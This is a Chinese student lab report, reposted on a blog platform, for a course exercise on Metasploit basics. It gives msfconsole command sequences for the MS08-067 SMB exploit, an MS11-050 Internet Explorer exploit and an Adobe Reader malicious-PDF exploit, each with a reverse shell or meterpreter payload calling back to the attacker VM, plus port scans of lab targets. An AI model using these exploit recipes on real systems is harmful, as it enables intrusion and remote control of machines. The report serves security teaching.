2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

最新推荐文章于 2024-08-25 12:26:45 发布
最新推荐文章于 2024-08-25 12:26:45 发布
阅读量129 收藏
点赞数
文章标签: 网络
原文链接:http://www.cnblogs.com/l97----/p/9002116.html
版权

2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode
exploit:使用者利用漏洞进行攻击的一个过程,是一个载具。
payload:攻击载荷,如后门等攻击代码。
encode:用来编码,用于伪装

实践过程记录

1.Windows服务渗透攻击——MS08-067安全漏洞

①攻击机:kali ②靶机:windows XP SP3(English)
先检查了一下是否ping通
1071551-20180507125456302-662982599.png

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf >search ms08-067//使用search命令搜寻有关漏洞MS08_067的相关信息
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)> show payloads//查看可以供我们使用的payload:
msf exploit(ms08_067_netapi)> set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(ms08_067_netapi)> set LHOST 192.168.72.131攻击者ip
msf exploit(ms08_067_netapi)> set LPORT 5319
msf exploit(ms08_067_netapi)> set RHOST 192.168.72.135 //靶机ip
msf exploit(ms08_067_netapi)> set target 0 //自动选择目标系统类型
msf exploit(ms08_067_netapi) > exploit

成功!攻击结果如下:

1071551-20180507125605881-2129707227.png

2.浏览器渗透攻击——MS11-050

①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.72.131 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5319 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH rhl19 //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit

成功得到Local ip:

1071551-20180507125716059-2042898467.png

用靶机访问http://192.168.72.131:8080/rhl19 ,出现了弹窗警告:
1071551-20180507130907854-1245985686.png

尝试修改一下ie浏览器的相关设置,降低其安全等级

1071551-20180507130916003-1026036893.png

1071551-20180507130940221-587529849.png

然而第二次在IE中访问以上网址还是失败

3.针对客户端的攻击Adobe

①攻击机:kali ②靶机:windowsXP Professional sp2 ③Adobe版本:9.3
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.72.131 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5319 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 20155319.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击

成功生成pdf。
1071551-20180507125759503-30441474.png

由于生成的文件是隐藏文件使用cp命令把其复制到别的目录中去。

将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:

msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.72.131 //攻击机ip
msf exploit(handler) > set LPORT 5319 //攻击端口固定
msf exploit(handler) > exploit

再把靶机上打开pdf文件,回连成功。
1071551-20180507125834804-1640985804.png

1071551-20180507125855040-1576790745.png

4.Metasploit之——信息收集模块

扫描端口
msf > use auxiliary/scanner/portscan/syn(使用portscan模块)
msf auxiliary(syn) > show options
msf auxiliary(syn) > set RHOSTS 192.168.72.137(目标)
msf auxiliary(syn) > set THREADS 50(线程)
msf auxiliary(syn) > exploit

1071551-20180507125922416-1055353156.png

扫描靶机的TCP端口使用情况

输入以下指令:

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(syn) > set RHOSTS 192.168.161.149(目标)
msf auxiliary(syn) > set PORTS 1-5327
msf auxiliary(syn) > run

run开启扫描,可以看到在winxp靶机上所有tcp端口的使用情况
1071551-20180507130148247-214315525.png

转载于:https://www.cnblogs.com/l97----/p/9002116.html

weixin_30483013
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
5. 重启sshd服务以应用更改: - 对于Debian/Ubuntu系统: ``` sudo systemctl restart sshd ``` - 对于CentOS/RHEL系统: ``` sudo systemctl restart ssh ``` 6. 验证OpenSSH版本以确认升级成功: ``` ...
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft ...
# 2017-2018-2 20155319『网络对抗技术Exp5MSF基础应用
weixin_34413802的博客
05-02 149
2017-2018-2 20155319『网络对抗技术Exp5MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击的一个过程,是一个载具。 payload:攻击载荷,如后门等攻击代码。 encode:用来编码,用于伪装 实践过程记录 1.Windows服务渗透攻击——MS08-067安全漏洞 ①攻击机:kal...
2017-2018-2 20155303『网络对抗技术Exp5MSF基础应用
weixin_34008933的博客
04-17 181
2017-2018-2 20155303『网络对抗技术Exp5MSF基础应用 ————————CONTENTS———————— 一.原理与实践说明 1.实践内容 2.预备知识 3.基础问题 二.实践过程记录 1.Windows服务渗透攻击——MS08-067安全漏洞 2.浏览器渗透攻击——MS11-050 3.针对Office软件的渗透攻击——MS10-087 4.针对Adobe R...
2017-2018-2 20155310『网络对抗技术Exp5MSF基础应用
weixin_30955341的博客
05-03 116
2017-2018-2 20155310『网络对抗技术Exp5MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞 payload:攻击载荷,如后门等攻击代码。 encode:指编码,对我们的程序或代码进行伪装。 实验内容 一个主动攻击实践,如ms08_067 1.启用...
2017-2018-2 20155224『网络对抗技术Exp5MSF基础应用
weixin_34345753的博客
05-06 101
基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。 payload也就相当于载荷,实际上就是之前我们实验中做到的shellcode,exploit把它传送到靶机中后,...
2017-2018-2 20155315《网络对抗技术Exp5MSF基础应用
weixin_30472035的博客
04-27 129
实验目的 学会用metasploit进行简单的攻击操作 教程 实验内容 metasploit中有六个模块分别是 渗透攻击模块(Exploit Modules) 辅助模块(Auxiliary Modules 攻击载荷(Payload Modules) 空字段模块(Nop Modules) 编码模块(Encoders) 后渗透攻击模块(Post) 本次实验使用的是exploit和auxiliar...
2017-2018-2 20155234『网络对抗技术Exp5MSF基础应用
weixin_30569001的博客
04-27 105
攻击MS08-067安全漏洞--WindowsXP 在kali输入msfconsole进入控制台,依次输入指令 第一次很遗憾失败了 发现是防火墙没关重新来过成功 攻击MS11-050安全漏洞--IE7.0 进入控制台,配置 在windows中打开IE访问 不知道为什么失败了,查看了狄老师的博客,她试验了很多方法也没有成功。 Adobe Reader软件的渗透攻击 进入控制台,配置生成 很...
2017-2018-2 20155314《网络对抗技术Exp5 MSF基础应用
axhc_chentao1981的博客
04-27 508
2017-2018-2 20155314《网络对抗技术Exp5 MSF基础应用 目录 实验内容 实验环境 基础问题回答 预备知识 实验步骤——基于Armitage的MSF自动化漏洞攻击实践 Armitage基础配置 ms08_067_netapi:自动化漏洞溢出攻击实践 ms14_064_ole_code_execution:IE漏洞自动化攻击实践 ms17_010_eterna...
2018-2019-2 网络对抗技术 20165324 Exp5MSF基础应用
weixin_34122810的博客
04-18 179
2018-2019-2 网络对抗技术 20165324 Exp5MSF基础应用 MSF基础知识: MSF基础框架: 主要模块模块(Module)。模块是指Metasploit框架中所使用的一段软件代码组件。 渗透攻击模块(Exploit Modules):是指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。 辅助模块(Auxiliary Modules): ...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
CVE-2018-8897
08-01
CVE-2018-8897 Exp, 我在Windows 2008 R2 测试成功1次,失败3次,其他系统没有测试过
CiscoIOSSNMPToolkit:Cisco iOS SNMP溢出漏洞利用工具包(CVE-2017-6736)
05-10
CiscoIOSSNMP工具包 Cisco iOS SNMP溢出漏洞利用工具包(CVE-2017-6736) CVE-2018-0296? 我最近修改了CVE-2018-0296,可与该原始漏洞利用结合使用,可用于进行侦察并事先查看设备中包含的内容。
浏览器发送HTTP请求的过程
最新发布
学Python的小白!
08-25 817
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
哪些类型的企业需要开展TPM管理培训?
tianxingjian713的博客
08-23 870
例如汽车制造企业、电子制造企业等,这些企业的生产线通常由大量高精度的自动化设备组成,一旦设备出现故障,可能会导致整个生产线停产,造成巨大的经济损失。开展TPM管理培训可以提高员工对设备的维护和管理能力,延长设备的使用寿命,降低设备维修成本,提高物流服务的效率和质量。通过开展TPM管理培训,让设备操作人员、维护人员和管理人员共同参与设备维护,实现设备的零故障运行,从而提高企业的竞争力。通过开展TPM管理培训,让员工了解设备的运行原理和风险点,加强设备的日常巡检和维护,提高设备的安全性和可靠性。
系统编程 网络 http协议
qq_69971969的博客
08-24 370
--------------------------------------表示了资源所在的路径。意思:域名解析=>把对应的域名解析为对应的ip。<协议>://<主机>:<端口>/<路径>万维网:http解决万维网之间互联互通。http:应用层协议,底层是tcp协议。http协议------应用层的协议。1.如何在万维网中表示一个资源?http协议加密:tls,ssl。计算机web端网络只能看到文字。<http>只是协议的一种。html 超文本标记语言。http 超文本传输协议。
《Cloud Native Data Center Networking》(云原生数据中心网络设计)读书笔记 -- 07数据中心的边缘
梆子井欢喜坨的博客
08-21 772
本章将帮助你回答以下问题。
Modbus-TCP——Libmodbus安装和使用(Ubuntu22.04)
计算机硕士的博客
08-21 375
Modbus-TCP——Libmodbus安装和使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值